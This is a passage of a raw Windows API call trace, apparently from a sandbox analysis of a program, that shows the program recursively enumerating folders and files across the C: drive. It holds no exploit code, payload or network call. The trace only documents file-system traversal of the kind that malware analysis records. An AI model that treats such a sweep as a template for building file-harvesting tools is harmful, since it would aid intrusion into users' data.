ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b20 [0033.073] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.073] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.073] FindClose (in: hFindFile=0x3750b20 | out: hFindFile=0x3750b20) returned 1 [0033.073] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0033.073] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0033.074] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3740b18 [0033.074] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-HK\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b20 [0033.074] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.074] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.074] FindClose (in: hFindFile=0x3750b20 | out: hFindFile=0x3750b20) returned 1 [0033.074] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0033.074] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0033.074] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3740b18 [0033.074] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-TW\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b20 [0033.074] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.074] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe83216ab, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11240, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.074] FindClose (in: hFindFile=0x3750b20 | out: hFindFile=0x3750b20) returned 1 [0033.074] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3740b18 | out: hHeap=0x5f0000) returned 1 [0033.074] FindNextFileW (in: hFindFile=0x6e10e0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0033.075] FindClose (in: hFindFile=0x6e10e0 | out: hFindFile=0x6e10e0) returned 1 [0033.075] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3730b10 | out: hHeap=0x5f0000) returned 1 [0033.075] FindNextFileW (in: hFindFile=0x3730ad0, lpFindFileData=0x2edfd00 | out: lpFindFileData=0x2edfd00*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x1002f, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0033.075] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3730b10 [0033.075] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750ba0 [0033.075] FindNextFileW (in: hFindFile=0x3750ba0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.075] FindNextFileW (in: hFindFile=0x3750ba0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0033.075] FindClose (in: hFindFile=0x3750ba0 | out: hFindFile=0x3750ba0) returned 1 [0033.075] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3730b10 | out: hHeap=0x5f0000) returned 1 [0033.075] FindNextFileW (in: hFindFile=0x3730ad0, lpFindFileData=0x2edfd00 | out: lpFindFileData=0x2edfd00*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0033.075] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3730b10 [0033.075] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*", lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="\xddf8\x63\x16")) returned 0xffffffff [0033.075] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3730b10 | out: hHeap=0x5f0000) returned 1 [0033.075] FindNextFileW (in: hFindFile=0x3730ad0, lpFindFileData=0x2edfd00 | out: lpFindFileData=0x2edfd00*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x813b7be0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0033.076] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3730b10 [0033.076] FindFirstFileW (in: lpFileName="C:\\MSOCache\\*", lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750ba0 [0033.076] FindNextFileW (in: hFindFile=0x3750ba0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.076] FindNextFileW (in: hFindFile=0x3750ba0, lpFindFileData=0x2edfa84 | out: lpFindFileData=0x2edfa84*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0033.076] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x3740b18 [0033.076] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\*", lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3750b20 [0033.227] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.228] FindNextFileW (in: hFindFile=0x3750b20, lpFindFileData=0x2edf808 | out: lpFindFileData=0x2edf808*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0016-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~3")) returned 1 [0033.230] FindNextFileW (in: hFindFile=0x3750be0, lpFindFileData=0x2edf58c | out: lpFindFileData=0x2edf58c*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xecdfa490, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee38cbf0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.230] FindNextFileW (in: hFindFile=0x3750be0, lpFindFileData=0x2edf58c | out: lpFindFileData=0x2edf58c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x393df700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x393df700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xed035930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x102fcbb, dwReserved0=0x0, dwReserved1=0x0, cFileName="ExcelLR.cab", cAlternateFileName="")) returned 1 [0034.735] FindClose (in: hFindFile=0x3ed1280 | out: hFindFile=0x3ed1280) returned 1 [0034.735] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed2068 | out: hHeap=0x5f0000) returned 1 [0034.735] FindNextFileW (in: hFindFile=0x3ed1180, lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0034.735] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*", lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1280 [0034.735] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.735] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe31667d9, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe337baef, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe337baef, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0034.735] FindClose (in: hFindFile=0x3ed1280 | out: hFindFile=0x3ed1280) returned 1 [0034.735] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed2068 | out: hHeap=0x5f0000) returned 1 [0034.735] FindNextFileW (in: hFindFile=0x3ed1180, lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0034.736] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*", lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1280 [0034.736] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x9e0df36a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.736] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a407849, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x9a407849, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x9a407849, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x15e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="boxed-correct.avi", cAlternateFileName="")) returned 1 [0034.737] FindClose (in: hFindFile=0x3ed1280 | out: hFindFile=0x3ed1280) returned 1 [0034.738] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed2068 | out: hHeap=0x5f0000) returned 1 [0034.738] FindNextFileW (in: hFindFile=0x3ed1180, lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0034.738] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*", lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1280 [0034.738] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.738] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f3c6a2, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe41519b8, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe41519b8, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0034.738] FindClose (in: hFindFile=0x3ed1280 | out: hFindFile=0x3ed1280) returned 1 [0034.738] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x3ed2068 | out: hHeap=0x5f0000) returned 1 [0034.738] FindNextFileW (in: hFindFile=0x3ed1180, lpFindFileData=0x2edf310 | out: lpFindFileData=0x2edf310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="et-EE", cAlternateFileName="")) returned 1 [0034.738] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*", lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3ed1280 [0034.957] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0034.957] FindNextFileW (in: hFindFile=0x3ed1280, lpFindFileData=0x2edf094 | out: lpFindFileData=0x2edf094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb4e9cfd, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xeb74b2cd, ftLastAccessTime.dwHighDateTime=0x1ca0420, 